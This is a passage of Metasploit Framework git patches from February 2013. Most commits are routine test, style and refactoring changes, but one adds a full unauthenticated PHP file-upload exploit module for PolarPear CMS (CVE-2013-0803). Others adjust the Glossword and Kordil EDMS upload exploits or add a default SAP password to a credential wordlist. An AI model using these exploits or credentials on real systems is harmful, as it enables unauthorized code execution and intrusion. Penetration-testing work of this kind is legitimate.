staticSizedFieldsBuf.unpack('VCCvvvvvVVVvvvvvVV') unless (@header_signature == CENTRAL_DIRECTORY_ENTRY_SIGNATURE) - raise ZipError, "Zip local header magic not found at location '#{localHeaderOffset}'" + raise ZipError, "Zip local header magic not found at location '#{localHeaderOffset}'" end set_time(lastModDate, lastModTime) @@ -628,7 +645,7 @@ module Zip end @comment = io.read(commentLength) unless (@comment && @comment.length == commentLength) - raise ZipError, "Truncated cdir zip entry header" + raise ZipError, "Truncated cdir zip entry header" end case @fstype From 214149265439309b1e46dd42a5881e438e779d9c Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sun, 24 Feb 2013 15:24:10 -0600 Subject: [PATCH 069/139] Per @brandont comment, use exit status instead. --- lib/msf/ui/console/command_dispatcher/core.rb | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 8d0b37c304..3d46d196c4 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2701,13 +2701,7 @@ class Core def is_metasploit_service_running cmd = "/usr/sbin/service" - return unless ::File.executable_real? cmd - services = %x{#{cmd} metasploit status} - expected = "Metasploit %s server is running." - %w{web rpc}.each do |svc| - return false unless services.include?(expected % svc) - end - return true + system(cmd, "metasploit", "status") # Both running returns true, otherwise, false. end def is_metasploit_debian_package_installed From d7c0ce4e4ae355201b4d3fa541e17316b3c3b566 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 25 Feb 2013 15:52:07 +1030 Subject: [PATCH 070/139] Fix 'check()' in glossword_upload_exec --- .../exploits/multi/http/glossword_upload_exec.rb | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 74ca5c1a1a..32fe7f9b43 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -60,12 +60,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Authenticating as user '#{user}'") begin res = login(base, user, pass) - if res and res.code == 200 - print_error("#{peer} - Authentication failed") - return Exploit::CheckCode::Unknown - elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ - print_good("#{peer} - Authenticated successfully") - return Exploit::CheckCode::Appears + if res + if res.code == 200 + print_error("#{peer} - Authentication failed") + return Exploit::CheckCode::Unknown + elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ + print_good("#{peer} - Authenticated successfully") + return Exploit::CheckCode::Appears + end end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout From 28fd92a013e4f4edcc300913bb3d450250c43956 Mon Sep 17 00:00:00 2001 From: Chris John Riley Date: Mon, 25 Feb 2013 09:00:57 +0100 Subject: [PATCH 071/139] Added new default password foe TMSADM Based on: http://blog.ptsecurity.com/2013/02/sap-unknown-default-password-for-tmsadm.html --- data/wordlists/sap_default.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/data/wordlists/sap_default.txt b/data/wordlists/sap_default.txt index 2102fd069b..4b37c915c9 100644 --- a/data/wordlists/sap_default.txt +++ b/data/wordlists/sap_default.txt @@ -6,6 +6,7 @@ SAPCPIC ADMIN EARLYWATCH SUPPORT TMSADM PASSWORD TMSADM ADMIN +TMSADM $1Pawd2& ADMIN welcome ADSUSER ch4ngeme ADS_AGENT ch4ngeme From 6e35813d6922b338a3a9adcd69af0d901230aca8 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 25 Feb 2013 08:19:58 -0600 Subject: [PATCH 072/139] Pending hashes need to end w a block --- spec/lib/rex/proto/http/client_spec.rb | 149 +++++++++++++++++-------- 1 file changed, 103 insertions(+), 46 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 6505655267..a2ed40f6f9 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -4,27 +4,30 @@ require 'rex/proto/http/client' # connection to 127.0.0.1:1. If you have some crazy local # firewall that is dropping packets to this, your tests # might be slow. I wonder how Travis-CI will react to this... - -# Set a standard excuse that indicates that the method -# under test needs to be first examined to figure out -# what's sane and what's not. -def excuse_lazy(test_method=nil) - ret = "need to determine pass/fail criteria" - test_method ? ret << " for #{test_method.inspect}" : ret -end - -# Complain about not having a "real" connection (can be mocked) -def excuse_needs_connection - "need to actually set up an HTTP server to test" -end - -# Complain about not having a real auth server (can be mocked) -def excuse_needs_auth - "need to set up an HTTP authentication challenger" -end - describe Rex::Proto::Http::Client do + class << self + + # Set a standard excuse that indicates that the method + # under test needs to be first examined to figure out + # what's sane and what's not. + def excuse_lazy(test_method=nil) + ret = "need to determine pass/fail criteria" + test_method ? ret << " for #{test_method.inspect}" : ret + end + + # Complain about not having a "real" connection (can be mocked) + def excuse_needs_connection + "need to actually set up an HTTP server to test" + end + + # Complain about not having a real auth server (can be mocked) + def excuse_needs_auth + "need to set up an HTTP authentication challenger" + end + + end + ip = "1.2.3.4" cli = Rex::Proto::Http::Client.new(ip) @@ -61,11 +64,17 @@ describe Rex::Proto::Http::Client do cli.close.should be_nil end - it "should send a request and receive a response", :pending => excuse_needs_connection + it "should send a request and receive a response", :pending => excuse_needs_connection do - it "should send a request and receive a response without auth handling", :pending => excuse_needs_connection + end - it "should send a request", :pending => excuse_needs_connection + it "should send a request and receive a response without auth handling", :pending => excuse_needs_connection do + + end + + it "should send a request", :pending => excuse_needs_connection do + + end it "should test for credentials" do # cli.should_not have_creds @@ -83,11 +92,17 @@ describe Rex::Proto::Http::Client do cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" end - it "should perform digest authentication", :pending => excuse_needs_auth + it "should perform digest authentication", :pending => excuse_needs_auth do - it "should perform negotiate authentication", :pending => excuse_needs_auth + end - it "should get a response", :pending => excuse_needs_connection + it "should perform negotiate authentication", :pending => excuse_needs_auth do + + end + + it "should get a response", :pending => excuse_needs_connection do + + end it "should end a connection with a stop" do cli.stop.should be_nil @@ -104,53 +119,95 @@ describe Rex::Proto::Http::Client do this_cli.pipelining?.should be_true end - it "should return an encoded URI", :pending => excuse_lazy(:set_encode_uri) + it "should return an encoded URI", :pending => excuse_lazy(:set_encode_uri) do - it "should return an encoded query string", :pending => excuse_lazy(:set_encode_qa) + end + + it "should return an encoded query string", :pending => excuse_lazy(:set_encode_qa) do + + end # These set_ methods all exercise the evasion opts, looks like - it "should set and return the URI", :pending => excuse_lazy(:set_uri) + it "should set and return the URI", :pending => excuse_lazy(:set_uri) do + + end - it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) + it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) do - it "should set and return the HTTP verb", :pending => excuse_lazy(:set_method) + end - it "should set and return the version string", :pending => excuse_lazy(:set_version) + it "should set and return the HTTP verb", :pending => excuse_lazy(:set_method) do - it "should set and return the HTTP seperator and body string", :pending => excuse_lazy(:set_body) + end - it "should set and return the path", :pending => excuse_lazy(:set_path_info) + it "should set and return the version string", :pending => excuse_lazy(:set_version) do - it "should set and return the whitespace between method and URI", :pending => excuse_lazy(:set_method_uri_spacer) + end - it "should set and return the whitespace between the version and URI", :pending => excuse_lazy(:set_uri_version_spacer) + it "should set and return the HTTP seperator and body string", :pending => excuse_lazy(:set_body) do - it "should set and return padding before the URI", :pending => excuse_lazy(:set_uri_prepend) + end + + it "should set and return the path", :pending => excuse_lazy(:set_path_info) do + + end + + it "should set and return the whitespace between method and URI", :pending => excuse_lazy(:set_method_uri_spacer) do + + end + + it "should set and return the whitespace between the version and URI", :pending => excuse_lazy(:set_uri_version_spacer) do + + end + + it "should set and return padding before the URI", :pending => excuse_lazy(:set_uri_prepend) do + + end it "should set and return padding after the URI" do cli.set_uri_append.should be_empty end - it "should set and return the host header", :pending => excuse_lazy(:set_host_header) + it "should set and return the host header", :pending => excuse_lazy(:set_host_header) do - it "should set and return the agent header", :pending => excuse_lazy(:set_agent_header) + end - it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header) + it "should set and return the agent header", :pending => excuse_lazy(:set_agent_header) do - it "should set and return the content-type header", :pending => excuse_lazy(:set_cookie_header) + end - it "should set and return the content-length header", :pending => excuse_lazy(:set_content_len_header) + it "should set and return the cookie header", :pending => excuse_lazy(:set_cookie_header) do - it "should set and return the basic authentication header", :pending => excuse_lazy(:set_basic_auth_header) + end - it "should set and return any extra headers", :pending => excuse_lazy(:set_extra_headers) + it "should set and return the content-type header", :pending => excuse_lazy(:set_cookie_header) do - it "should set the chunked encoding header", :pending => excuse_lazy(:set_chunked_header) + end - it "should set and return raw_headers", :pending => "#set_raw_headers() doesn't seem to actually do anything" + it "should set and return the content-length header", :pending => excuse_lazy(:set_content_len_header) do - it "should set and return a formatted header", :pending => excuse_lazy(:set_formatted_header) + end + + it "should set and return the basic authentication header", :pending => excuse_lazy(:set_basic_auth_header) do + + end + + it "should set and return any extra headers", :pending => excuse_lazy(:set_extra_headers) do + + end + + it "should set the chunked encoding header", :pending => excuse_lazy(:set_chunked_header) do + + end + + it "should set and return raw_headers", :pending => "#set_raw_headers() doesn't seem to actually do anything" do + + end + + it "should set and return a formatted header", :pending => excuse_lazy(:set_formatted_header) do + + end it "should respond to its various accessors" do cli.should respond_to :config From caed599f7d52602112c3f03233eeabef6a45a066 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 25 Feb 2013 08:25:35 -0600 Subject: [PATCH 073/139] Backed out all the fails from the auth bits --- spec/lib/rex/proto/http/client_spec.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index a2ed40f6f9..e0849f59c3 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -41,17 +41,17 @@ describe Rex::Proto::Http::Client do cli.instance_variable_get(:@context).should == {} cli.instance_variable_get(:@ssl).should be_false cli.instance_variable_get(:@proxies).should be_nil - cli.instance_variable_get(:@username).should be_empty - cli.instance_variable_get(:@password).should be_empty + # cli.instance_variable_get(:@username).should be_empty + # cli.instance_variable_get(:@password).should be_empty cli.config.should be_a_kind_of Hash cli.config_types.should be_a_kind_of Hash end - it "should produce a raw HTTP request" do + it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request end - it "should produce a CGI HTTP request" do + it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request end @@ -85,7 +85,7 @@ describe Rex::Proto::Http::Client do it "should send authentication", :pending => excuse_needs_connection - it "should produce a basic authentication header" do + it "should produce a basic authentication header", :pending => "Waiting for #1500" do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip @@ -218,8 +218,8 @@ describe Rex::Proto::Http::Client do cli.should respond_to :conn cli.should respond_to :context cli.should respond_to :proxies - cli.should respond_to :username - cli.should respond_to :password + # cli.should respond_to :username + # cli.should respond_to :password cli.should respond_to :junk_pipeline # These are supposed to be protected cli.should respond_to :ssl From 73f631437365a610f9c3a4fbd6561a6c80f42e37 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 25 Feb 2013 08:29:08 -0600 Subject: [PATCH 074/139] Moving @cli and @ip to instance vars --- Gemfile.lock | 12 ++++ spec/lib/rex/proto/http/client_spec.rb | 82 +++++++++++++------------- 2 files changed, 54 insertions(+), 40 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 99f60b664d..c50df873bf 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,8 +28,12 @@ GEM coderay (1.0.8) diff-lcs (1.1.3) i18n (0.6.1) + json (1.7.7) method_source (0.8.1) + msgpack (0.5.2) multi_json (1.0.4) + nokogiri (1.5.6) + pcaprub (0.11.3) pg (0.14.1) pry (0.9.10) coderay (~> 1.0.5) @@ -37,6 +41,7 @@ GEM slop (~> 3.3.1) rake (10.0.2) redcarpet (2.2.2) + robots (0.10.1) rspec (2.12.0) rspec-core (~> 2.12.0) rspec-expectations (~> 2.12.0) @@ -57,10 +62,17 @@ PLATFORMS ruby DEPENDENCIES + activerecord activesupport (>= 3.0.0) + json metasploit_data_models! + msgpack + nokogiri + pcaprub + pg (>= 0.11) rake redcarpet + robots rspec (>= 2.12) simplecov (= 0.5.4) yard diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index e0849f59c3..28cb3bb245 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -28,31 +28,33 @@ describe Rex::Proto::Http::Client do end - ip = "1.2.3.4" + before(:all) do + @ip = "1.2.3.4" + @cli = Rex::Proto::Http::Client.new(@ip) + end - cli = Rex::Proto::Http::Client.new(ip) it "should respond to intialize" do - cli.should be + @cli.should be end it "should have a set of default instance variables" do - cli.instance_variable_get(:@hostname).should == ip - cli.instance_variable_get(:@port).should == 80 - cli.instance_variable_get(:@context).should == {} - cli.instance_variable_get(:@ssl).should be_false - cli.instance_variable_get(:@proxies).should be_nil - # cli.instance_variable_get(:@username).should be_empty - # cli.instance_variable_get(:@password).should be_empty - cli.config.should be_a_kind_of Hash - cli.config_types.should be_a_kind_of Hash + @cli.instance_variable_get(:@hostname).should == @ip + @cli.instance_variable_get(:@port).should == 80 + @cli.instance_variable_get(:@context).should == {} + @cli.instance_variable_get(:@ssl).should be_false + @cli.instance_variable_get(:@proxies).should be_nil + # @cli.instance_variable_get(:@username).should be_empty + # @cli.instance_variable_get(:@password).should be_empty + @cli.config.should be_a_kind_of Hash + @cli.config_types.should be_a_kind_of Hash end it "should produce a raw HTTP request", :pending => "Waiting for PR #1500" do - cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request + @cli.request_raw.should be_a_kind_of Rex::Proto::Http::Request end it "should produce a CGI HTTP request", :pending => "Waiting for PR #1500" do - cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request + @cli.request_cgi.should be_a_kind_of Rex::Proto::Http::Request end it "should attempt to connect to a server" do @@ -61,7 +63,7 @@ describe Rex::Proto::Http::Client do end it "should be able to close a connection" do - cli.close.should be_nil + @cli.close.should be_nil end it "should send a request and receive a response", :pending => excuse_needs_connection do @@ -77,7 +79,7 @@ describe Rex::Proto::Http::Client do end it "should test for credentials" do - # cli.should_not have_creds + # @cli.should_not have_creds # this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1, {}, false, nil, nil, "user1", "pass1" ) # this_cli.should have_creds pending "Should actually respond to :has_creds" @@ -89,7 +91,7 @@ describe Rex::Proto::Http::Client do u = "user1" p = "pass1" b64 = ["#{u}:#{p}"].pack("m*").strip - cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" + @cli.basic_auth_header("user1","pass1").should == "Basic #{b64}" end it "should perform digest authentication", :pending => excuse_needs_auth do @@ -105,15 +107,15 @@ describe Rex::Proto::Http::Client do end it "should end a connection with a stop" do - cli.stop.should be_nil + @cli.stop.should be_nil end it "should test if a connection is valid" do - cli.conn?.should be_false + @cli.conn?.should be_false end it "should tell if pipelining is enabled" do - cli.pipelining?.should be_false + @cli.pipelining?.should be_false this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) this_cli.pipeline = true this_cli.pipelining?.should be_true @@ -166,7 +168,7 @@ describe Rex::Proto::Http::Client do end it "should set and return padding after the URI" do - cli.set_uri_append.should be_empty + @cli.set_uri_append.should be_empty end it "should set and return the host header", :pending => excuse_lazy(:set_host_header) do @@ -210,30 +212,30 @@ describe Rex::Proto::Http::Client do end it "should respond to its various accessors" do - cli.should respond_to :config - cli.should respond_to :config_types - cli.should respond_to :pipeline - cli.should respond_to :local_host - cli.should respond_to :local_port - cli.should respond_to :conn - cli.should respond_to :context - cli.should respond_to :proxies - # cli.should respond_to :username - # cli.should respond_to :password - cli.should respond_to :junk_pipeline + @cli.should respond_to :config + @cli.should respond_to :config_types + @cli.should respond_to :pipeline + @cli.should respond_to :local_host + @cli.should respond_to :local_port + @cli.should respond_to :conn + @cli.should respond_to :context + @cli.should respond_to :proxies + # @cli.should respond_to :username + # @cli.should respond_to :password + @cli.should respond_to :junk_pipeline # These are supposed to be protected - cli.should respond_to :ssl - cli.should respond_to :ssl_version - cli.should respond_to :hostname - cli.should respond_to :port + @cli.should respond_to :ssl + @cli.should respond_to :ssl_version + @cli.should respond_to :hostname + @cli.should respond_to :port end # Not super sure why these are protected... it "should refuse access to its protected accessors" do - expect {cli.ssl}.to raise_error NoMethodError - expect {cli.ssl_version}.to raise_error NoMethodError - expect {cli.hostname}.to raise_error NoMethodError - expect {cli.port}.to raise_error NoMethodError + expect {@cli.ssl}.to raise_error NoMethodError + expect {@cli.ssl_version}.to raise_error NoMethodError + expect {@cli.hostname}.to raise_error NoMethodError + expect {@cli.port}.to raise_error NoMethodError end end From 0421cff9139c39a4b0ad5e484dcbcba91c609c8f Mon Sep 17 00:00:00 2001 From: Tasos Laskos Date: Mon, 25 Feb 2013 19:49:39 +0200 Subject: [PATCH 075/139] Exploit::Remote::Web#perform_request: timeout set to 10 --- lib/msf/core/exploit/web.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/web.rb b/lib/msf/core/exploit/web.rb index dcec407024..917cdf73fa 100644 --- a/lib/msf/core/exploit/web.rb +++ b/lib/msf/core/exploit/web.rb @@ -99,7 +99,7 @@ module Exploit::Remote::Web 'vars_post' => post, 'headers' => headers, 'cookie' => cookies - }, 0.01 ) + }, 10 ) end # From 52241b847a045e6d7816d75cbc1b84ff38333c2a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 25 Feb 2013 12:20:37 -0600 Subject: [PATCH 076/139] Uses normalize_uri instead of manually adding a slash --- modules/exploits/multi/http/glossword_upload_exec.rb | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index 32fe7f9b43..57b069ceb9 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -51,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote def check base = target_uri.path - base << '/' if base[-1, 1] != '/' peer = "#{rhost}:#{rport}" user = datastore['USERNAME'] pass = datastore['PASSWORD'] @@ -105,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}gw_admin.php", + 'uri' => normalize_uri(base, 'gw_admin.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data_post, }) @@ -117,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}gw_login.php", + 'uri' => normalize_uri(base, 'gw_login.php'), 'data' => "arPost%5Buser_name%5D=#{user}&arPost%5Buser_pass%5D=#{pass}&arPost%5Blocale_name%5D=en-utf8&a=login&sid=&post=Enter" }) return res @@ -127,7 +126,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - base << '/' if base[-1, 1] != '/' @peer = "#{rhost}:#{rport}" @fname= rand_text_alphanumeric(rand(10)+6) + '.php' user = datastore['USERNAME'] @@ -163,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}gw_admin.php?a=edit-own&t=users", + 'uri' => normalize_uri(base, 'gw_admin.php?a=edit-own&t=users'), 'cookie' => "sid#{token}=#{sid}" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout @@ -182,7 +180,7 @@ class Metasploit3 < Msf::Exploit::Remote begin send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}#{shell_uri}", + 'uri' => normalize_uri(base, shell_uri), }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") From 904a69ba63bd6aae0065bef4150a9283d8a35c9b Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 25 Feb 2013 13:02:03 -0600 Subject: [PATCH 077/139] Move xor tests to the right filenames Thanks, simplecov, for telling me that these weren't actually getting run. --- spec/lib/rex/encoding/xor/{byte.rb => byte_spec.rb} | 0 spec/lib/rex/encoding/xor/{dword.rb => dword_spec.rb} | 0 spec/lib/rex/encoding/xor/{qword.rb => qword_spec.rb} | 0 spec/lib/rex/encoding/xor/{word.rb => word_spec.rb} | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename spec/lib/rex/encoding/xor/{byte.rb => byte_spec.rb} (100%) rename spec/lib/rex/encoding/xor/{dword.rb => dword_spec.rb} (100%) rename spec/lib/rex/encoding/xor/{qword.rb => qword_spec.rb} (100%) rename spec/lib/rex/encoding/xor/{word.rb => word_spec.rb} (100%) diff --git a/spec/lib/rex/encoding/xor/byte.rb b/spec/lib/rex/encoding/xor/byte_spec.rb similarity index 100% rename from spec/lib/rex/encoding/xor/byte.rb rename to spec/lib/rex/encoding/xor/byte_spec.rb diff --git a/spec/lib/rex/encoding/xor/dword.rb b/spec/lib/rex/encoding/xor/dword_spec.rb similarity index 100% rename from spec/lib/rex/encoding/xor/dword.rb rename to spec/lib/rex/encoding/xor/dword_spec.rb diff --git a/spec/lib/rex/encoding/xor/qword.rb b/spec/lib/rex/encoding/xor/qword_spec.rb similarity index 100% rename from spec/lib/rex/encoding/xor/qword.rb rename to spec/lib/rex/encoding/xor/qword_spec.rb diff --git a/spec/lib/rex/encoding/xor/word.rb b/spec/lib/rex/encoding/xor/word_spec.rb similarity index 100% rename from spec/lib/rex/encoding/xor/word.rb rename to spec/lib/rex/encoding/xor/word_spec.rb From 690e7ec8a781984f4cee1a5a928281df4a54beff Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 25 Feb 2013 13:28:00 -0600 Subject: [PATCH 078/139] Uses normalize_uri --- modules/exploits/multi/http/kordil-edms-upload-exec.rb | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/http/kordil-edms-upload-exec.rb b/modules/exploits/multi/http/kordil-edms-upload-exec.rb index d4caccb78b..f680d527e3 100644 --- a/modules/exploits/multi/http/kordil-edms-upload-exec.rb +++ b/modules/exploits/multi/http/kordil-edms-upload-exec.rb @@ -49,14 +49,13 @@ class Metasploit3 < Msf::Exploit::Remote def check base = target_uri.path - base << '/' if base[-1, 1] != '/' peer = "#{rhost}:#{rport}" # retrieve software version from login page begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}global_group_login.php" + 'uri' => normalize_uri(base, 'global_group_login.php') }) if res and res.code == 200 if res.body =~ /
Kordil EDMS v2\.2\.60/ @@ -84,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}users_add.php", + 'uri' => normalize_uri(base, 'users_add.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data_post }) @@ -104,7 +103,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - base << '/' if base[-1, 1] != '/' @peer = "#{rhost}:#{rport}" @fname = rand_text_numeric(7) @@ -127,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote begin res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}userpictures/#{@fname}.php" + 'uri' => normalize_uri(base, 'userpictures', "#{@fname}.php") }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") From f3f913edc5bb871ec62908c3723b6a37eb477723 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 25 Feb 2013 13:29:27 -0600 Subject: [PATCH 079/139] Correct bad naming style --- .../{kordil-edms-upload-exec.rb => kordil_edms_upload_exec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/multi/http/{kordil-edms-upload-exec.rb => kordil_edms_upload_exec.rb} (100%) diff --git a/modules/exploits/multi/http/kordil-edms-upload-exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb similarity index 100% rename from modules/exploits/multi/http/kordil-edms-upload-exec.rb rename to modules/exploits/multi/http/kordil_edms_upload_exec.rb From cae19399140a86ef55dbbcb7d0d1c07abc10b060 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 25 Feb 2013 13:44:11 -0600 Subject: [PATCH 080/139] Kinda too long --- modules/auxiliary/gather/xbmc_traversal.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index c55c8034d5..3f03554c15 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -16,8 +16,8 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => "XBMC Web Server Directory Traversal", 'Description' => %q{ - This module exploits a directory traversal bug in XBMC 11, up until the 2012-11-04 nightly build. - The module can only be used to retrieve files. + This module exploits a directory traversal bug in XBMC 11, up until the + 2012-11-04 nightly build. The module can only be used to retrieve files. }, 'License' => MSF_LICENSE, 'Author' => From 1ed74b46becba32d01392d03b50aacc02b2d0e9d Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 25 Feb 2013 14:14:57 -0600 Subject: [PATCH 081/139] Add CVE-2013-0803 From: http://dev.metasploit.com/redmine/issues/7691 --- .../multi/http/polarcms_upload_exec.rb | 106 ++++++++++++++++++ 1 file changed, 106 insertions(+) create mode 100644 modules/exploits/multi/http/polarcms_upload_exec.rb diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb new file mode 100644 index 0000000000..41cc4f750b --- /dev/null +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -0,0 +1,106 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + + +require 'msf/core' +require 'msf/core/exploit/php_exe' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::PhpEXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PolarPearCms PHP File Upload Vulnerability', + 'Description' => %q{ + This module exploits a file upload vulnerability found in PlarPear CMS + By abusing the upload.php file, a malicious user can upload a file to a temp + directory without authentication, which results in arbitrary code execution. + }, + 'Author' => + [ + 'Fady Mohamed Osman <@Fady_Osman>' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', 'CVE-2013-0803' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], + [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'JAN 21 2012')) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The full URI path to Polarbearcms', '/polarbearcms']) , + OptString.new('UPLOADDIR', [true, 'The directory to upload to starting from web root. This should be writable', '/polarbearcms']) + ], self.class) + end + + def check + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{uri}includes/jquery.uploadify/upload.php" + }) + + if not res or res.code != 200 + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Appears + end + + def exploit + uri = target_uri.path + uri << '/' if uri[-1,1] != '/' + + upload_dir = datastore['UPLOADDIR'] + upload_dir << '/' if upload_dir[-1,1] != '/' + + peer = "#{rhost}:#{rport}" + + @payload_name = "#{rand_text_alpha(5)}.php" + php_payload = get_write_exec_payload(:unlink_self=>true) + + data = Rex::MIME::Message.new + data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") + data.add_part("#{uri}includes/jquery.uploadify/", nil, nil, "form-data; name=\"folder\"") + post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + print_status("#{peer} - Uploading payload #{@payload_name}") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}includes/jquery.uploadify/upload.php?folder=#{upload_dir}", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data + }) + if not res or res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") + end + + upload_uri = "#{upload_dir}#{@payload_name}" + print_status("#{peer} - Executing payload #{@payload_name}") + res = send_request_raw({ + 'uri' => upload_uri, + 'method' => 'GET' + }) + end +end From 1ce86b7adb34e8d35b5ca72a670f62867961921e Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 25 Feb 2013 14:29:10 -0600 Subject: [PATCH 082/139] Whitespace --- lib/rex/proto/http/client.rb | 8 ++++---- lib/rex/proto/http/client_request.rb | 6 +++--- modules/auxiliary/scanner/http/http_login.rb | 4 ++-- spec/lib/rex/proto/http/client_spec.rb | 2 +- 4 